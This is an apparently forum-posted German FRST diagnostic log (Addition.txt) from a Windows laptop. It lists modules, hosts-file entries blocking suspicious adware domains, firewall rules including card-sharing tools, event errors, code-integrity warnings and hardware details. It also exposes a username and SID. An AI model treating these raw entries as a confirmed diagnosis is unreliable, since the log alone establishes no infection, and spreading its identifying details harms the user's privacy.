2017-03-25 14:45 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-25 14:45 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-05-11 16:46 - 2017-04-28 01:36 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-05-11 16:46 - 2017-04-28 01:36 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-05-11 16:46 - 2017-04-28 01:37 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-05-26 16:07 - 2017-05-26 16:07 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-26 16:07 - 2017-05-26 16:07 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-26 16:07 - 2017-05-26 16:07 - 43202048 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-26 16:07 - 2017-05-26 16:07 - 02442752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.16.595.0_x64__kzf8qxf38zg5c\skypert.dll
2014-09-11 05:10 - 2014-09-11 05:10 - 00294672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe
2014-09-11 05:10 - 2014-09-11 05:10 - 00109328 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\TransitionServer.exe
2014-03-26 12:50 - 2014-09-11 05:18 - 00058864 _____ () C:\Program Files (x86)\Lenovo\Energy Manager\kbdhook.dll
2014-09-11 05:16 - 2014-09-11 05:16 - 00815104 _____ () C:\Program Files\Lenovo PhoneCompanion\adb.exe
2017-05-24 17:12 - 2017-05-24 17:13 - 01726976 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8218.40507.0_x64__8wekyb3d8bbwe\HxMail.exe
2017-05-24 17:12 - 2017-05-24 17:13 - 13096136 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8218.40507.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-05-23 15:27 - 2017-05-23 15:27 - 03918848 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1705.1301.0_x64__8wekyb3d8bbwe\Calculator.exe
2014-09-11 04:55 - 2013-10-01 11:09 - 00078880 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2014-09-11 05:10 - 2014-09-11 05:10 - 00105744 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Config\1366\TransitionLib.dll
2014-09-11 05:10 - 2014-09-11 05:10 - 00102160 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\LUpdatePackage.dll
2014-09-11 05:15 - 2014-09-11 05:15 - 00101648 _____ () C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LUpdatePackage.dll
2014-09-11 04:54 - 2013-09-04 01:53 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ==========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2017-05-22 19:11 - 00001175 _____ C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 dscdn.pw
127.0.0.1 beautifllink.xyz
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1373792661-1632314611-2226728799-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Sven\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [UDP Query User{70C98C17-A596-42BB-B137-49E2235D2735}C:\users\sven\appdata\local\temp\temp1_anti_pairing_analyzer_tool_neue_version_vom_29.06.2014.zip\oscamemmv14spy.exe] => (Allow) C:\users\sven\appdata\local\temp\temp1_anti_pairing_analyzer_tool_neue_version_vom_29.06.2014.zip\oscamemmv14spy.exe
FirewallRules: [TCP Query User{86BD33FC-F2A0-499C-9F89-B6969AD9164C}C:\users\sven\appdata\local\temp\temp1_anti_pairing_analyzer_tool_neue_version_vom_29.06.2014.zip\oscamemmv14spy.exe] => (Allow) C:\users\sven\appdata\local\temp\temp1_anti_pairing_analyzer_tool_neue_version_vom_29.06.2014.zip\oscamemmv14spy.exe
FirewallRules: [UDP Query User{97DBA41A-D3E7-4DFA-8DB7-AFCFDEE53A09}C:\users\sven\downloads\dcce2_150\dcc_e2.exe] => (Allow) C:\users\sven\downloads\dcce2_150\dcc_e2.exe
FirewallRules: [TCP Query User{825E395D-2672-4D35-B9F0-11A4D386E7A3}C:\users\sven\downloads\dcce2_150\dcc_e2.exe] => (Allow) C:\users\sven\downloads\dcce2_150\dcc_e2.exe
FirewallRules: [{AB2F80D0-CA18-4D6F-9733-4FEC2AA59059}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{9694F13F-82F3-4CC2-AD48-DDF320941577}] => (Allow) C:\Program Files\Lenovo PhotoMasterImport\PhotoMasterImport.exe
FirewallRules: [{0E60B64B-D2A8-4672-82DC-DFBFAD5AEF2B}] => (Allow) LPort=55100
FirewallRules: [{EBA83668-D73B-44D3-8D0F-6D884B666348}] => (Allow) C:\Program Files (x86)\Lenovo\Lenovo Photo Master\subsys\AdvPhotoEditor\PhotoDirector5.exe
FirewallRules: [{41D3870D-E920-4E44-A893-58CB20864217}] => (Allow) C:\Program Files (x86)\Lenovo\Lenovo Photo Master\PhotoPlus.exe
FirewallRules: [{DAA5E963-7DC5-481B-91D1-78D85D1A082E}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{763DEB3F-F6A3-4FD2-B80B-E3F51729C7C0}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe
FirewallRules: [{959C4357-3F58-4365-B1CA-1310A630F582}] => (Allow) C:\Program Files\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{0C156D3B-7DE5-4E9E-9D97-75ED026A2486}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{F5F9A8AE-7277-4D51-9489-C747C1448475}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{2BCC3649-E41E-4C2C-A604-7AC4505950C6}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{60442B7B-A780-4B7A-ACD1-9F111E3BA864}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1C3CB182-EE89-4686-A6ED-53D46FC81A5A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{214D2D35-DFBD-45C2-9CAA-7B7BA9ABB822}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{131BA427-41C4-4313-810D-1D6F1E11CB3F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{8874F517-FDBD-4E57-B87E-F24866857671}G:\d\dreambox\dcce2_150\dcc_e2.exe] => (Allow) G:\d\dreambox\dcce2_150\dcc_e2.exe
FirewallRules: [UDP Query User{FE9C04F3-C20E-4BEE-8BCA-4539A1625745}G:\d\dreambox\dcce2_150\dcc_e2.exe] => (Allow) G:\d\dreambox\dcce2_150\dcc_e2.exe
FirewallRules: [TCP Query User{2FB604FA-694C-4772-B21F-C5C06E1517A4}C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe] => (Allow) C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe
FirewallRules: [UDP Query User{4161900A-CE14-4B15-99C8-E55098B5BBFB}C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe] => (Allow) C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe
FirewallRules: [TCP Query User{1BEE34D5-9A50-43CA-8949-58C99E414D45}C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe] => (Allow) C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe
FirewallRules: [UDP Query User{6118D363-87E6-4B44-A268-97F3CA81A46B}C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe] => (Allow) C:\users\sven\downloads\fritz.box_7330_sl.05.08.recover-image.exe
FirewallRules: [TCP Query User{B4E616D1-AD0D-4FAE-ABB4-A1517F3ABC3F}C:\users\sven\downloads\tftpd32.452\tftpd32.exe] => (Allow) C:\users\sven\downloads\tftpd32.452\tftpd32.exe
FirewallRules: [UDP Query User{6B9DE602-9283-4A95-8459-6C9DAE114108}C:\users\sven\downloads\tftpd32.452\tftpd32.exe] => (Allow) C:\users\sven\downloads\tftpd32.452\tftpd32.exe
FirewallRules: [{CD2E4AB1-BF86-4B7E-B5AD-CEEEEF108805}] => (Allow) C:\Users\Sven\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{369AEA11-5B16-4FC1-89D6-1AAABB0DA84B}] => (Allow) C:\Users\Sven\AppData\Local\Temp\andy-x64\Setup.exe
FirewallRules: [{48575F20-14A3-42CE-A180-CBDE8C7AFBFD}] => (Allow) C:\Users\Sven\AppData\Local\Temp\andy-x64\Setup.exe
FirewallRules: [{96A60C65-9EC0-40C6-BBD2-DE0E5D1FD872}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{DBFE6C19-A5B3-400E-876E-968F480375B9}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{FAEB18DD-2BC1-4719-8109-BFA24B103418}] => (Allow) C:\Program Files\Andy\AndyConsole.exe
FirewallRules: [{C303D653-076C-4C16-B9EF-6EEA6452F799}] => (Allow) C:\Program Files\Andy\AndyConsole.exe
FirewallRules: [{4F56B17E-56A2-4566-B49A-7FDA85284DC6}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{09A3AF03-32F0-4A76-A90F-0161868554CA}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{2791D014-F78F-4411-9E62-E9636FBC96D4}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe
FirewallRules: [{231DD3D7-A951-444B-A675-8FE985B35A50}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe
FirewallRules: [{53E841D2-E68F-498A-A958-0C1295E051A6}] => (Allow) C:\Users\Sven\AppData\Local\Temp\RemoveTemp.exe
FirewallRules: [{0B0BD3AA-8165-43DE-B358-A039A0E0EB23}] => (Allow) C:\Users\Sven\AppData\Local\Temp\RemoveTemp.exe
FirewallRules: [{FD49C802-D407-4C33-9529-3C57ED4376C5}] => (Allow) C:\Program Files\Andy\SetupFiles\VMwareCheck.exe
FirewallRules: [{5FCB44E6-0583-4A2D-AB6A-2BF0B72B19CB}] => (Allow) C:\Program Files\Andy\SetupFiles\VMwareCheck.exe
FirewallRules: [{7B254D8F-FCC9-4866-81C1-DFEEBC62265B}] => (Allow) C:\Program Files\Andy\SetupFiles\AndyDoctor.exe
FirewallRules: [{0580AF2E-CED8-4F26-BC2E-5ADAB360942C}] => (Allow) C:\Program Files\Andy\SetupFiles\AndyDoctor.exe
FirewallRules: [{EE356C88-9B96-47C3-B775-AE2A0B98B8F5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D176F7AD-33AA-4503-A52D-F51CCA294339}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{8A809066-75CE-47A0-A79F-58FBC02F2A38}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{BB7B51BB-CC5A-48B1-99EF-E095DF53D557}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A8D60E98-7EF4-4552-A861-03B2739820F9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{5E10DBF6-ABFC-407B-A64B-EA6E467B6B9E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{0DE1BB9C-75B4-4D35-A897-73CEA2C08C27}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{B5A5B1D2-D327-4308-BB44-527724A5EE88}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{A0BF320C-B472-4FD5-9AFF-E6FD82630CD4}C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe] => (Allow) C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe
FirewallRules: [UDP Query User{B15E0590-6912-466E-A8D7-8187424181A6}C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe] => (Allow) C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe
FirewallRules: [{59ED4EB1-AF71-41F4-8058-E8A7CA687C86}] => (Allow) C:\Program Files (x86)\Wing FTP Server\WFTPServer.exe
FirewallRules: [{90235596-2E8B-434B-BAC6-4E7D646F92F0}] => (Allow) C:\Program Files (x86)\Wing FTP Server\WFTPServer.exe
FirewallRules: [{5458DA97-469A-4D3F-A86E-B8735E76CA55}] => (Allow) C:\Program Files (x86)\Wing FTP Server\WFTPTray.exe
FirewallRules: [{09B9D2B0-BA24-4430-907F-728458C8EC25}] => (Allow) C:\Program Files (x86)\Wing FTP Server\WFTPTray.exe
FirewallRules: [TCP Query User{CAD40A09-1E76-489D-908A-BCF6B346AB1D}C:\program files (x86)\crossftp\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\crossftp\jre\bin\javaw.exe
FirewallRules: [UDP Query User{D5D2A8CC-26B7-4C31-888A-859329A8609C}C:\program files (x86)\crossftp\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\crossftp\jre\bin\javaw.exe
FirewallRules: [TCP Query User{D59D8518-314A-477F-81A9-1A093030A148}C:\program files (x86)\ftprush\ftprush.exe] => (Allow) C:\program files (x86)\ftprush\ftprush.exe
FirewallRules: [UDP Query User{FA46D17A-9B80-47E2-9406-FB8DB839466B}C:\program files (x86)\ftprush\ftprush.exe] => (Allow) C:\program files (x86)\ftprush\ftprush.exe
FirewallRules: [{3A02CC0D-8D37-4B4E-9CE4-5410FEC37249}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{11566B0E-29EE-4989-8854-EE919D16ED17}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{B48A1FC2-4437-412D-B491-6956FBC6736B}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{BF717A19-0EA9-4617-8848-E33DBA6015F5}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{ACD905EA-47E6-499B-9D18-2B9E97945B07}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Wiederherstellungspunkte =========================
11-05-2017 17:01:11 Windows Update
16-05-2017 19:27:57 Windows Update
22-05-2017 19:43:22 Wiederherstellungsvorgang
23-05-2017 21:49:42 Removed Paragon ExtFS for Windows
27-05-2017 23:01:47 TAXMAN 2017 wurde installiert.
==================== Fehlerhafte Geräte im Gerätemanager =============
Name: Lenovo EasyCamera
Description: Lenovo EasyCamera
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: DMAX-AVC
Service: rtsuvc
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/28/2017 12:55:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3946609
Error: (05/28/2017 12:55:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 3946609
Error: (05/28/2017 12:55:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/28/2017 10:46:33 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\redist\1033\vcredist_arm.exe".
Die abhängige Assemblierung "Microsoft.Windows.Common-Controls,language="*",processorArchitecture="arm",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/27/2017 11:01:49 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".
Details:
AddWin32ServiceFiles: Unable to back up image of service WinSAPSvc since QueryServiceConfig API failed
System Error:
Das System kann die angegebene Datei nicht finden.
.
Error: (05/27/2017 11:01:49 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.
System Error:
Zugriff verweigert
.
Error: (05/27/2017 04:02:52 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 10775578
Error: (05/27/2017 04:02:52 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 10775578
Error: (05/27/2017 04:02:52 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/27/2017 01:01:57 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\redist\1033\vcredist_arm.exe".
Die abhängige Assemblierung "Microsoft.Windows.Common-Controls,language="*",processorArchitecture="arm",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Systemfehler:
=============
Error: (05/28/2017 10:57:29 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "terana" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/28/2017 10:46:13 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Manager für heruntergeladene Karten" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/28/2017 10:44:47 AM) (Source: DCOM) (EventID: 10010) (User: LENOVO-PC)
Description: Der Server "{4991D34B-80A1-4291-83B6-3328366B9097}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (05/28/2017 10:42:46 AM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{4991D34B-80A1-4291-83B6-3328366B9097}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (05/28/2017 10:40:37 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Routing und RAS" wurde mit dem folgenden dienstspezifischen Fehler beendet:
Der angeforderte Name ist gültig, es wurden jedoch keine Daten des angeforderten Typs gefunden.
Error: (05/28/2017 10:40:36 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/28/2017 10:40:35 AM) (Source: RemoteAccess) (EventID: 20152) (User: )
Description: Der momentan konfigurierte Authentifizierungsanbieter konnte nicht geladen und initialisiert werden. Der angeforderte Name ist gültig, es wurden jedoch keine Daten des angeforderten Typs gefunden.
Error: (05/28/2017 10:40:34 AM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "chip1click" hat einen ungültigen aktuellen Status gemeldet: 0
Error: (05/28/2017 10:40:34 AM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "chip1click" hat einen ungültigen aktuellen Status gemeldet: 0
Error: (05/28/2017 10:40:07 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Kacheldaten-Modellserver" wurde mit folgendem Fehler beendet:
%%2147943515 = Der Computer wird heruntergefahren.
CodeIntegrity:
===================================
Date: 2017-05-23 18:56:22.233
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcp100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-23 18:56:21.974
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcr100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-23 15:27:44.041
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcp100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-23 15:27:43.702
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcr100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-22 21:49:33.369
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcp100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-22 21:49:33.309
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcr100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-22 20:49:24.384
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcp100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-22 20:49:24.124
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcr100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-22 19:18:44.686
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcp100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-22 19:18:44.636
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Andy\msvcr100.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i3-4030U CPU @ 1.90GHz
Prozentuale Nutzung des RAM: 76%
Installierter physikalischer RAM: 4003.94 MB
Verfügbarer physikalischer RAM: 955.57 MB
Summe virtueller Speicher: 6435.94 MB
Verfügbarer virtueller Speicher: 2181.36 MB
==================== Laufwerke ================================
Drive c: (Windows8_OS) (Fixed) (Total:195.24 GB) (Free:85.38 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:1.18 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 238.5 GB) (Disk ID: B11FF8EB)
Partition: GPT.
==================== Ende von Addition.txt ============================
|
Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.